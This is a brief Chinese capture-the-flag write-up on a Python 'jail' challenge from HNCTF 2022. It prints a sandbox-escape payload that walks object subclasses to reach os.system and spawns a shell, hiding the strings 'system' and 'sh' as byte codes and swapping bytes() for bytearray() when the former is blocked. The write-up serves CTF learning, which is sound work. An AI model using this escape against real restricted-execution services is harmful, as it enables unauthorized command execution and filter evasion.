【misc】[HNCTF 2022 WEEK2]calc_jail_beginner_level4.1(JAIL) --沙盒逃逸,python模板注入变换

发布时间 2023-12-20 23:08:59作者: GGBomb

这道题没给附件,直接连上看看

这里一开始用().__class__.__base__.__subclasses__()[-4].__init__.__globals__[bytes([115,121,115,116,101,109]).decode()](bytes([115,104]).decode())进行尝试,后面发现bytes函数被禁用了,可以用另外的函数代替().__class__.__base__.__subclasses__()[-4].__init__.__globals__[bytearray([115,121,115,116,101,109]).decode()](bytearray([115,104]).decode())